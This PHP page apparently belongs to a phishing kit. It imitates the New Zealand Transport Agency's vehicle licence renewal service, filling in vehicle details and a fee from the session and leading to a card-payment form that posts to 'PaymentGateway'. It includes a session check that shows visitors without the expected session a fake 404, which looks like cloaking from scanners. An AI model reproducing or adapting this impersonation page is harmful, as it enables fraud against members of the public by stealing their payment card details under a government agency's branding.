<?php
session_start();
if(isset($_SESSION['access']) && $_SESSION['access'] === true && isset($_SESSION['is_user']) && $_SESSION['is_user'] == true){
}else{
    header("HTTP/1.0 404 Not Found");
    die();
}
?>
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <meta http-equiv="X-UA-Compatible" content="IE=EDGE" />
  <title>Online services</title>
  <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,300italic,400italic,600italic' rel='stylesheet' type='text/css' />
  <link href="assets/css/css.css" rel="stylesheet" type="text/css">
  <link href="assets/css/screen.css" rel="stylesheet">
  <link href="assets/css/Override.css" rel="stylesheet">
    <link rel="stylesheet" href="assets/css/icons-data-svg.css">


</head>

<body class="theme--neutral">
<style>
  .payicons-mc {
    float: left;
    height: 40px;
    width: 100px;
    background-image: url(assets/img/mc.png);
    background-repeat: no-repeat;
    background-size: auto 40px;
  }
  .payicons-visa {
    margin-top: 7px;
    float: left;
    height: 29px;
    width: 100px;
    background-image: url(assets/img/vs.png);
    background-repeat: no-repeat;
    background-size: auto 29px;
  }
</style>
<div class="container">
  <!-- header component -->
  <header>
    <a class="access access-skip" accesskey="2" href="#nzta-main-content">
      Skip to content
    </a>
    <a class="access access-skip" accesskey="0" href="#nzta-access-keys"></a>
    <div class="access section access-keys" id="nzta-access-keys">
      <div class="wrapper">
        <div class="[ layout ]">
          <div class="[ grid ]">
            <div class="[ col ]">
              <h4>
                Access keys for nzta.govt.nz
              </h4>
              <ul class="list-unstyled">
                <li><strong class="access-keys__key">h</strong>   Home</li>
                <li><strong class="access-keys__key">m</strong>   Menu</li>
                <li><strong class="access-keys__key">0</strong>   Show list of access keys</li>
                <li><strong class="access-keys__key">2</strong>   Skip to content</li>
                <li><strong class="access-keys__key">3</strong>   Skip to top</li>
              </ul>
            </div>
          </div>
        </div>
      </div>
    </div>

    <div id="nztaSiteHeader" class="global-nav theme--strong">
      <div class="[ wrapper ]">
        <div class="[ layout ]">
          <div class="[ grid grid--justify ]">
            <div class='[ col large-2 medium-2 small-3 ] '>
              <span class="i i-nzta-logo">
                    </span>
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>
  <!-- component routing placeholder -->

  <div class="theme--neutral">

    <div class='header theme--dark '>
      <div class="[ section-m ] header__title">
        <div class='wrapper'>
          <div class="layout layout--half">
            <div class="grid">
              <div class="col">
                <ol class="breadcrumb"><li><span>Online services</span></li></ol>
                <h1>Renewal of vehicle licence (rego)</h1>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <a name="nzta-main-content" id="nzta-main-content"></a>

    <div class=" [ wrapper ] ">



      <div class="[ section layout layout--half layout--nudge ] theme--paper">
        <div class="[ grid ]">
          <div class="[ col ]" id="nzta-main-content">
              <div class="progress--bar">
                  <label class="field__label" for="">Where I'm up to:</label>
                  <div class="i-bg-hatched">
                      <div style="width: 65%;"></div>
                  </div>
              </div>
              <div class="field--details ">
                  <h4>Confirm details</h4>
              </div>
              <div>

                  <dl>
                      <dt>
                          Plate number:
                      </dt>
                      <dd>
                          <?php echo $_SESSION['car_data']['plate_number'];?>
                      </dd><dt>
                          Vehicle year:
                      </dt>
                      <dd>
                          <?php echo $_SESSION['car_data']['year'];?>
                      </dd><dt>
                          Vehicle make:
                      </dt>
                      <dd>
                          <?php echo $_SESSION['car_data']['make'];?>
                      </dd><dt>
                          Vehicle model:
                      </dt>
                      <dd>
                          <?php echo $_SESSION['car_data']['model'];?>
                      </dd><dt>
                          Vehicle colour:
                      </dt>
                      <dd>
                          <?php echo $_SESSION['car_data']['color'];?>
                      </dd>        </dl>
              </div>
            <div class="field--details ">
              <p><span>How would you like to pay?</span></p>
              <div>
                <dl>
                  <dt>
                    Expiry date of new licence:
                  </dt>
                  <dd>
                    <?php echo $_SESSION['expiration_date'];?>
                  </dd>
                  <dt>
                    Licence period:
                  </dt>
                  <dd>
                    <?php echo $_SESSION['month'];?> months
                  </dd>
                  <dt>
                    Fee:
                  </dt>
                  <dd>
                    $<?php echo $_SESSION['amount_to_pay'];?> (Incl GST)
                  </dd>
                </dl>
              </div>
              <p><strong>You'll be transferred to a secure payment site to complete your payment.</strong></p>
              <p><span>You'll be charged&nbsp;</span><strong>$<?php echo $_SESSION['amount_to_pay'];?></strong></p>
              <p style="color: #000000; text-transform: none; text-indent: 0px; letter-spacing: normal; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p>
              <p style="color: #000000; text-transform: none; text-indent: 0px; letter-spacing: normal; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><strong>NOTE: Please don't close your browser window while your payment is being processed.</strong></p>
              <p style="color: #000000; text-transform: none; text-indent: 0px; letter-spacing: normal; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-weight: 400; word-spacing: 0px; white-space: normal; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p>
              <p>&nbsp;</p>
            </div>

            <div class="field--submit">
              <div class="payicons">
                <div class="payicons-visa" title="Visa"></div>
                <div class="payicons-mc" title="Mastercard"></div>
              </div>

              <form method="post" action="PaymentGateway">
                <br><br><br>

                <span class="field__input">
                              <input class="btn--submit btn--green" name="SubmitButton" value="Credit or debit card" type="submit">
                    </span>
                <input name="__RequestVerificationToken" type="hidden" value="">
              </form>

            </div>
            <div class="field--submit">
                    <span class="field__input">
                      <input class="btn--submit btn--red cancel" name="SubmitButton" onClick="location.href = 'Entry';" id="SubmitButton" value="Cancel transaction" formnovalidate="" type="submit" onclick="location.href = 'Entry';">
                    </span>
            </div>

          </div>
        </div>
      </div>


    </div>
  </div>
  <!-- footer component -->
  <footer class="footer">

    <div class="section theme--neutral footer">
      <div class="wrapper">
        <div class="layout">
          <div class="grid grid-flip-small">
            <div class="col large-two-thirds medium-full-size ">
              <ul class="footer_pages list-inline list-unstyled small-block-list">

                <li>
                  <a href="#">
                    <div class='icon-wrapper'>
                      <i class="i i-contact-grey"></i>
                    </div>
                    <span>Contact</span>
                  </a>
                </li>
              </ul>
            </div>
            <div class="col medium-half">
              <p class='small'>
                &copy; 2023 Transport Agency, all rights reserved
              </p>

            </div>
            <div class="col medium-half text-right--medium">
              <p>
                <a href="https://www.govt.nz" target="_blank">
                  <i class="i i-nzgovt"></i>
                  <span class="sr-only">New Zealand Government</span>
                </a>
              </p>
            </div>
          </div>
        </div>
      </div>
    </div>
  </footer>

</div>



<script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.2.1.min.js" crossorigin="anonymous" integrity="sha384-xBuQ/xzmlsLoJpyjoggmTEz8OWUFM0/RC5BsqQBDX2v5cMvDHcMakNTNrHIW2I5f">
</script>
<script>(window.jQuery||document.write("\u003Cscript src=\u0022\/assets\/js\/jquery-3.2.1.min.js\u0022 crossorigin=\u0022anonymous\u0022 integrity=\u0022sha384-xBuQ\/xzmlsLoJpyjoggmTEz8OWUFM0\/RC5BsqQBDX2v5cMvDHcMakNTNrHIW2I5f\u0022\u003E\u003C\/script\u003E"));</script>
<script>
  $(document).on('click', '#btnPaymark, #btnPOLi, #btnCancel', function () {
    $.blockUI({ message: '<div class="loader"></div>' });
  });
</script>



</body>

</html>